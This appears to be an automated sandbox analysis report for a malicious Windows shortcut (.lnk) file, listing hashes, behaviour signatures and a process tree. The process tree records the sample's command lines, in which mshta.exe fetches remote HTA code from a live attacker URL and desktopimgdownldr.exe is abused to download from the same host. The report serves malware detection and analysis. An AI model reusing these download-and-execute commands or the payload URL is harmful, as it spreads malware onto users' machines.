Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    29-11-2024 04:23

General

  • Target

    f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk

  • Size

    1KB

  • MD5

    95bfcc2eac48c76681aa2d97a5674201

  • SHA1

    f72d50b2bba6e479ec106ae2f6fe993ab6eef99a

  • SHA256

    f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478

  • SHA512

    952485dbd0096257ab62ef2fa684d1333fa1e495ad29d8e7a8aaa41d6b316abb48ca5ad2c1b704db7e5bc346a8350039a059c7d5ad323b072ecd3911ac4c5925

Score
10/10

Malware Config

Extracted

  • Language
    hta
  • Source
    hta.dropper
  • URLs
    https://0day.works/a

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://0day.works/a
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c set "SYSTEMROOT=C:\Windows\Temp" && desktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr
        3⤵
          PID:2332

Network

MITRE ATT&CK Enterprise v15